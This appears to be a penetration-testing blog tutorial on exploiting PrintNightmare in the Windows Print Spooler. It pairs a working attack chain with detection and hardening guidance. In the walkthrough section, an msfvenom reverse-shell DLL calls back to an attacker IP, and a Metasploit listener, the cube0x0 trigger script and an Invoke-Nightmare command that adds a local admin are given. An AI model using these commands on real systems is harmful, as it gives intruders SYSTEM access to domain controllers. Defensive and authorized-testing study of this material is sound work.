PrintNightmare: Abusing the Windows Print Spooler for Privilege Escalation and RCE

Windows Privesc
2026.04.02
Time it takes to read this article 5 minutes.

Legal & Ethical Disclaimer: This article is for education and authorized testing only. Run these techniques exclusively against systems you own or have explicit, written permission to test. Exploiting the Print Spooler on machines you do not control is illegal and can crash production services. Stay in scope.

Introduction / Overview

PrintNightmare is the umbrella name for a pair of vulnerabilities in the Windows Print Spooler service (spoolsv.exe) that allow an attacker to execute arbitrary code as NT AUTHORITY\SYSTEM. Two CVEs are involved:

  • CVE-2021-1675 — originally patched in June 2021 as a local privilege escalation, later found to also enable RCE.
  • CVE-2021-34527 — the remote code execution variant, assigned after researchers demonstrated the June patch was incomplete.

What makes this bug devastating is that the Print Spooler service runs as SYSTEM and is enabled by default on virtually every Windows host — including Domain Controllers. An authenticated low-privileged domain user can point a DC at a malicious driver and obtain SYSTEM on it. In this article you'll learn how the MS-RPRN/MS-PAR driver-installation path is abused, walk through a working PoC, and — just as importantly — how blue teams detect and shut it down.

How It Works / Background

Windows printer drivers are installed via the MS-RPRN (Print System Remote Protocol) and MS-PAR (Print System Asynchronous Remote Protocol) RPC interfaces. The relevant RPC call is RpcAddPrinterDriverEx, which wraps the AddPrinterDriverEx API.

Normally, installing a printer driver requires the SeLoadDriverPrivilege and administrative rights. The core flaw: the spooler failed to validate that the caller was authorized when the driver was loaded from a path the attacker controlled. By passing the APD_INSTALL_WARNED_DRIVER flag (value 0x8000), an attacker bypasses the warning/validation logic that would normally block an untrusted driver.

The attack abuses the pDriverPath and pConfigFile fields of the DRIVER_INFO_2 structure. Instead of a legitimate driver, the attacker supplies a path to a malicious DLL on an SMB share (or a local path). The spooler — running as SYSTEM — copies the "driver" into the spooler driver store and then loads the configuration DLL, executing the attacker's code in the SYSTEM context.

Because the spooler can reach out to a UNC path (\\attacker\share\evil.dll), this becomes remote: any authenticated user who can bind to the spooler RPC endpoint on a target can force it to fetch and load a DLL.

Prerequisites / Lab Setup

For the RCE/AD variant you need:

  • A target running an unpatched Print Spooler (e.g., a Windows Server 2019 DC pre-July-2021 patches).
  • Valid domain credentials for any low-privileged user.
  • A Linux attacker box with Impacket installed.
  • An SMB share to host the malicious DLL (Impacket's smbserver.py works, ideally with anonymous/guest access enabled).

Quick environment check from the attacker:

# Confirm the MS-RPRN spooler interface is reachable on the target
rpcdump.py 'DOMAIN/user:Password@10.10.10.10' | grep -i 'MS-RPRN\|spool'

A non-empty result means the Print System Remote Protocol endpoint is exposed and the host is a candidate.

Attack Walkthrough / PoC

The reference public exploit is cube0x0/CVE-2021-1675, which ships an Impacket-style script. Note: it requires a modified Impacket build (cube0x0's fork) because it implements RPC structures not present in upstream at release time.

Step 1 — Generate a malicious DLL payload

# 64-bit reverse-shell DLL via msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f dll -o evil.dll

Step 2 — Host the DLL on an SMB share

# Anonymous SMB share named "share" serving the current directory
sudo smbserver.py -smb2support share ./

The DLL is now reachable at \\10.10.14.5\share\evil.dll.

Step 3 — Start a listener

# Catch the SYSTEM shell
sudo msfconsole -q -x \
  "use exploit/multi/handler; \
   set payload windows/x64/meterpreter/reverse_tcp; \
   set LHOST 10.10.14.5; set LPORT 4444; run"

Step 4 — Trigger the spooler

# Force the target spooler to load our DLL as SYSTEM
python3 CVE-2021-1675.py \
  'DOMAIN/user:Password@10.10.10.10' \
  '\\10.10.14.5\share\evil.dll'

If the host is vulnerable, the spooler fetches evil.dll, loads it as the config DLL, and you receive a Meterpreter session as NT AUTHORITY\SYSTEM.

Alternative: add a local admin (no payload needed)

Tools like the PowerShell Invoke-Nightmare (cube0x0) drop a DLL that creates a local administrator account rather than calling back:

# Run on the target (local PrivEsc variant, CVE-2021-1675)
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hax" -NewPassword "P@ssw0rd123!"

This adds hax to the local Administrators group — clean and reliable for a local privilege escalation when you already have a low-priv shell.

Verifying privilege

whoami
# nt authority\system   <- success

Attack Flow Diagram

PrintNightmare: Abusing the Windows Print Spooler for Privilege Escalation and RCE diagram 1

Text version: a low-privileged user calls RpcAddPrinterDriverEx pointing the config file at a malicious DLL on an SMB share; the SYSTEM-level spooler fetches and loads it, granting the attacker SYSTEM execution.

Detection & Defense (Blue Team)

PrintNightmare is loud if you know where to look, and several robust mitigations exist.

Patch first

Apply the July 2021 cumulative updates and later for CVE-2021-34527. Patching alone is necessary but historically was not sufficient — the registry settings below were required to fully close the RCE path on some builds.

Disable the spooler where it isn't needed

Domain Controllers almost never need to print. Disable the service entirely:

Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

Restrict driver installation to admins

The key hardening registry value forces only administrators to install printer drivers. Under:

HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint

set:

# Block non-admin driver installs and updates
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" -Name "NoWarningNoElevationOnInstall" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" -Name "UpdatePromptSettings" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" -Name "RestrictDriverInstallationToAdministrators" -Type DWord -Value 1

RestrictDriverInstallationToAdministrators = 1 is the single most effective control: it stops RpcAddPrinterDriverEx from accepting drivers from non-admins.

Block outbound spooler-to-internet behavior

Prevent the spooler from reaching remote SMB shares it shouldn't, and restrict who can connect to the named pipe \pipe\spoolss at the firewall layer.

Detection / hunting

  • Event log: Enable the Microsoft-Windows-PrintService/Operational log and watch for Event ID 808 ("The print spooler failed to load a plug-in module") and 316.
  • DLLs loaded by spoolsv: Hunt for spoolsv.exe loading DLLs from C:\Windows\System32\spool\drivers\x64\3\ with suspicious or recently-written names, especially DLLs fetched over SMB.
  • SMB pull from spooler: Correlate spoolsv.exe initiating outbound SMB to a workstation/attacker IP — this is highly abnormal.
  • MITRE ATT&CK: Maps to T1068 (Exploitation for Privilege Escalation) and T1210 (Exploitation of Remote Services).

A Sigma-style hunt: alert when ParentImage ends with spoolsv.exe and Image is rundll32.exe, cmd.exe, powershell.exe, or any unsigned DLL load. If you've locked down lateral movement, also review SMB relay defenses and Active Directory hardening basics.

Conclusion

PrintNightmare remains one of the cleanest paths from a single set of domain credentials to SYSTEM on a Domain Controller, precisely because the Print Spooler runs as SYSTEM and trusts attacker-supplied driver paths via AddPrinterDriverEx. The fix is layered: patch, disable the spooler on servers that don't print, and set RestrictDriverInstallationToAdministrators. For red teamers, it's a reliable escalation primitive worth checking on every engagement; for defenders, it's a reminder that legacy services running as SYSTEM are prime targets. If your engagement also touched credential theft, see our Kerberoasting guide for the next step in the kill chain.

References

Comments

Copied title and URL